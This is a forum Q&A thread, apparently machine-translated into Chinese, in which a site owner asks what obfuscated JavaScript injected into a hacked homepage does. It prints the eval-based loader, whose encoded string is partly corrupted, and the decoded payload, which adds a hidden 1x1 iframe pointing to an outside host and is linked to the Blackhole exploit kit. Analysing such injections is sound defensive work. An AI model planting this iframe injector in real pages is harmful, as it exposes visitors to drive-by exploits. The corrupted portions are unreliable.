我們的一個網站最近盜用了他們的ftp賬戶,結果攻擊者在他們的主頁html中注入了下面的JavaScript代碼。我對JavaScript很滿意,但是我無法做出這些代碼實際上正在做什麼的頭或尾。這裏的其他人看到這是怎麼回事?注入惡意JavaScript - 它有什麼作用?
p=parseInt;ss=(123)?String.fromCharCode:0;asgq="[email protected][email protected][email protected]!20!3d!20!64!6f!63!7[email protected][email protected][email protected][email protected][email protected][email protected][email protected]!6e!2f[email protected][email protected][email protected][email protected]!6f!6e!20[email protected][email protected]!6c!65!2e[email protected][email protected][email protected][email protected][email protected][email protected][email protected][email protected]!6c!65!2e[email protected][email protected]!6c![email protected]!66!20!28!2[email protected][email protected][email protected][email protected][email protected]!20!7b[email protected][email protected][email protected][email protected][email protected][email protected]!3b!d!a!20!20!20!20!20!20!20!2[email protected][email protected][email protected][email protected][email protected][email protected][email protected][email protected][email protected]!3b".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=12;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s="";if(zz)for(i=0;i-484!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}
中改變e(縣)CONSOLE.LOG(S)後,我得到以下:
(function() {
var fqy = document.createElement('iframe');
fqy.src = 'http://wineloverguide.com/_vti_bin/counter.php';
fqy.style.position = 'absolute';
fqy.style.border = '0';
fqy.style.height = '1px';
fqy.style.width = '1px';
fqy.style.left = '1px';
fqy.style.top = '1px';
if (!document.getElementById('fqy')) {
document.write('<div id=\'fqy\'></div>');
document.getElementById('fqy').appendChild(fqy);
} })();
在一部分,我看到'e = eval'。所以我建議最後把'e(s)'改爲'console.log(s)'。這樣做表明它創建了一個'
你先生,是個天才!現在你爲什麼回答評論而不是答案,所以我可以選擇它!? – SublymeRick
此外,這可能與[Blackhole漏洞利用工具包](http://en.wikipedia.org/wiki/Blackhole_exploit_kit)有關[根據報告](http://urlquery.net/report.php?id = 1733469)在另一個受類似事件影響的網站上運行。 – summea